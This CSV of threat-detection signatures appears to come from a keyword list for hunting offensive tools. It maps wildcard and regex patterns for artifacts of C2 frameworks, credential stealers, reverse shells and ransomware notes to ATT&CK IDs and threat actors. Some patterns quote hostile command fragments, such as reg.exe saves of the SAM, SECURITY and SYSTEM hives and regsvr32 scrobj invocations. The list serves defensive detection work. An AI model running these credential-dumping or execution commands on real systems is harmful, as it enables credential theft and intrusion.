"*reg.exe save HKLM\SECURITY security_*",".{0,1000}reg\.exe\ssave\sHKLM\\SECURITY\ssecurity_.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#registry","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56866"
"*reg.exe save hklm\security*",".{0,1000}reg\.exe\ssave\shklm\\security.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","56867"
"*reg.exe save HKLM\SYSTEM sys*",".{0,1000}reg\.exe\ssave\sHKLM\\SYSTEM\ssys.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#registry","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56869"
"*reg.exe save hklm\system*",".{0,1000}reg\.exe\ssave\shklm\\system.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","56870"
"*reg.py *@* save -keyName 'HKLM\SAM*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SAM.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#registry","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56881"
"*reg.py *@* save -keyName 'HKLM\SECURITY*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SECURITY.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#registry","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56882"
"*reg.py *@* save -keyName 'HKLM\SYSTEM*",".{0,1000}reg\.py\s.{0,1000}\@.{0,1000}\ssave\s\-keyName\s\'HKLM\\SYSTEM.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#registry","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56883"
"*reGeorg-master*",".{0,1000}reGeorg\-master.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","56885"
"*reGeorgSocksProxy.py*",".{0,1000}reGeorgSocksProxy\.py.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","56886"
"*RegHiveBackup.exe*",".{0,1000}RegHiveBackup\.exe.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","1","#registry","N/A","10","10","N/A","N/A","N/A","N/A","56887"
"*Register-MaliciousWmiEvent*",".{0,1000}Register\-MaliciousWmiEvent.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","56893"
"*register-python-argcomplete --no-defaults exegol*",".{0,1000}register\-python\-argcomplete\s\-\-no\-defaults\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56894"
"*Register-SQLC2Agent*",".{0,1000}Register\-SQLC2Agent.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","56895"
"*Registry KeeTheifLurker * Created*",".{0,1000}Registry\sKeeTheifLurker\s.{0,1000}\sCreated.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","56896"
"*registry_hijacking_eventvwr*",".{0,1000}registry_hijacking_eventvwr.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56897"
"*registry_hijacking_fodhelper*",".{0,1000}registry_hijacking_fodhelper.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","56898"
"*RegistryImplant*",".{0,1000}RegistryImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","56899"
"*registry-read.py*",".{0,1000}registry\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56900"
"*RegistryTinker.exe*",".{0,1000}RegistryTinker\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","56901"
"*RegReeper.7z*",".{0,1000}RegReeper\.7z.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56902"
"*RegReeper.cpp*",".{0,1000}RegReeper\.cpp.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56903"
"*RegReeper.exe*",".{0,1000}RegReeper\.exe.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56904"
"*RegReeper.sln*",".{0,1000}RegReeper\.sln.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56905"
"*RegReeper.vcxproj*",".{0,1000}RegReeper\.vcxproj.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56906"
"*Reg-Restore-Persistence-Mole-main*",".{0,1000}Reg\-Restore\-Persistence\-Mole\-main.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","N/A","10","1","51","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z","56907"
"*regsvr32.exe .\Redemption.dll*",".{0,1000}regsvr32\.exe\s\.\\Redemption\.dll.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","56909"
"*regsvr32.exe .\Redemption64.dll*",".{0,1000}regsvr32\.exe\s\.\\Redemption64\.dll.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","56910"
"*regsvr32.exe /s /n /u /i: * scrobj.dll*",".{0,1000}regsvr32\.exe\s\/s\s\/n\s\/u\s\/i\:\s.{0,1000}\sscrobj\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","0","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","56911"
"*regsvr32.exe -u .\Redemption.dll*",".{0,1000}regsvr32\.exe\s\-u\s\.\\Redemption\.dll.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","56912"
"*regsvr32.exe -u .\Redemption64.dll*",".{0,1000}regsvr32\.exe\s\-u\s\.\\Redemption64\.dll.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","56913"
"*regsvr32_command_delivery_server*",".{0,1000}regsvr32_command_delivery_server.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","56914"
"*reinstall_original_pw.py*",".{0,1000}reinstall_original_pw\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tool","https://github.com/risksense/zerologon","1","1","N/A","N/A","N/A","7","657","146","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z","56915"
"*rekallreader.py*",".{0,1000}rekallreader\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56916"
"*relay*/utils/enum.py*",".{0,1000}relay.{0,1000}\/utils\/enum\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","56918"
"*RelayPackets.py*",".{0,1000}RelayPackets\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","56920"
"*Release of BloodHound*",".{0,1000}Release\sof\sBloodHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","56922"
"*Release.Lime-Crypter.v0.5.1.exe.zip*",".{0,1000}Release\.Lime\-Crypter\.v0\.5\.1\.exe\.zip.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","56923"
"*release/chaserv*",".{0,1000}release\/chaserv.{0,1000}","offensive_tool_keyword","chashell","Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks","T1071.004 - T1572 - T1071 - T1027","TA0011 - TA0005 - TA0008","N/A","PYSA","C2","https://github.com/sysdream/chashell","1","1","N/A","N/A","10","10","1068","135","2022-04-05T17:22:14Z","2019-02-15T14:54:48Z","56924"
"*release/chashell_*",".{0,1000}release\/chashell_.{0,1000}","offensive_tool_keyword","chashell","Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks","T1071.004 - T1572 - T1071 - T1027","TA0011 - TA0005 - TA0008","N/A","PYSA","C2","https://github.com/sysdream/chashell","1","1","N/A","N/A","10","10","1068","135","2022-04-05T17:22:14Z","2019-02-15T14:54:48Z","56925"
"*release/mipsel_agent*",".{0,1000}release\/mipsel_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","56926"
"*Release/S-inject.exe*",".{0,1000}Release\/S\-inject\.exe.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","1","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","56927"
"*ReleaseKeePass.exe*",".{0,1000}ReleaseKeePass\.exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","56928"
"*ReleaseKeePass.exe*",".{0,1000}ReleaseKeePass\.exe.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","56929"
"*ReleaseKeeTheft.exe*",".{0,1000}ReleaseKeeTheft\.exe.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","56930"
"*Release-ReflectiveDLL\Implant.x64.pdb*",".{0,1000}Release\-ReflectiveDLL\\Implant\.x64\.pdb.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","56931"
"*reltypade1977@protonmail.com*",".{0,1000}reltypade1977\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56932"
"*rem call nthash-win64 /getntlmhash*",".{0,1000}rem\scall\snthash\-win64\s\/getntlmhash.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","56933"
"*rem cheap bruteforce ... very slow ... ok for a few passwords*",".{0,1000}rem\scheap\sbruteforce\s\.\.\.\svery\sslow\s\.\.\.\sok\sfor\sa\sfew\spasswords.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","56934"
"*REM Generate meterpreter dll payload*",".{0,1000}REM\sGenerate\smeterpreter\sdll\spayload.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","56935"
